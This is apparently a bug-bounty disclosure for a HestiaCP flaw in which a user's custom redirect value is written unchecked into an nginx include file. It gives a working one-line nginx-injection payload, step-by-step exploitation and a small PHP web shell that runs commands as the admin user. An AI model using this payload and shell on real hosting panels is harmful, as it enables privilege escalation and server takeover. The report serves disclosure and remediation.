History: Jul 26, 2022 - 8:33 p.m.

Improper Input Validation Leads to Privilege Escalation and Denial of Service

2022-07-26 20:33:51
redstarp2
www.huntr.dev

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 6.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

EPSS: 0.001 Low
Percentile: 40.4%

Description

Improper input validation allows an attacker to escalate privileges and can crash the nginx server.

There is no input validation in v-add-web-domain-redirect#L82 or on the "v-redirect-custom" input of the "Edit Web Domain" page: the value is written directly into the /home/user/conf/web/domain.com/nginx.conf_redirect file, which is included by /home/user/conf/web/domain.com/nginx.conf, so a value containing nginx syntax is parsed as server configuration.


/home/user/conf/web/domain.com/nginx.conf

...
    location ~ /\.(?!well-known\/|file) {
        deny all;
        return 404;
    }

    include /home/test/conf/web/poc.com/nginx.conf_*;
}


/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is "asd")


if ($host != "asd") {
   return 301 $scheme://asd$request_uri;
}


/home/user/conf/web/domain.com/nginx.conf_redirect file after payload


if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #") {
   return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #$request_uri;
}
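A validation step of the kind this report calls for, as an added example (not the project's own code): the redirect target is accepted only as a host, or an http(s) URL with optional port and path, made of URL-safe characters, so anything nginx would read as configuration syntax (quotes, braces, semicolons, `$`, `#`, whitespace) is refused before the two-line redirect block shown above is rendered. The function names and the accepted grammar are assumptions.

```shell
#!/bin/sh
# Added example, not HestiaCP code. Validates a redirect target before it is
# rendered into nginx.conf_redirect (the block format is the one shown above).

is_valid_redirect_target() {
    target="$1"
    # Hard length limit: nothing this long is a legitimate host or URL.
    [ "${#target}" -le 253 ] || return 1
    # Allowlist of characters (assumption): any other byte, including
    # quotes, braces, ';', '$', '#' and whitespace, rejects the value.
    case "$target" in
        *[!A-Za-z0-9.:/_~%?=\&-]*) return 1 ;;
    esac
    # Structure: optional scheme, DNS labels, optional port, optional path.
    label='[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    re="^(https?://)?${label}(\\.${label})*(:[0-9]{1,5})?(/[A-Za-z0-9._~/%?=&-]*)?\$"
    printf '%s' "$target" | grep -Eq "$re"
}

# Renders the redirect block only for a validated target; returns 1 otherwise.
render_redirect_conf() {
    is_valid_redirect_target "$1" || return 1
    printf 'if ($host != "%s") {\n   return 301 $scheme://%s$request_uri;\n}\n' "$1" "$1"
}
```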


Proof of Concept

Payload (has to be one line!)

redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #

Exploiting

[0] Log in as a user.

[1] Create a domain in the dashboard.

[2] Go to Files in the top bar.

[3] Go to the "public_html" folder and create a PHP file with contents like the one below; open it in a browser and use the full path and hostname it prints to prepare your payload.

x.php

<?php
echo getcwd();
echo "<br>";
system("hostname");

[4] Go to the "Edit Web Domain" page in the dashboard, select "Enable domain redirection", then select "Redirect visitors to a custom domain or web address", enter the payload in the text box and click the save button.

[5] Go to the "public_html" folder and create a PHP file named adminShell.php.

adminShell.php


<?php
system("id; whoami;");


[6] Visit /adminShell.php in a browser; the commands run as the "admin" user.

PoC Video

https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing
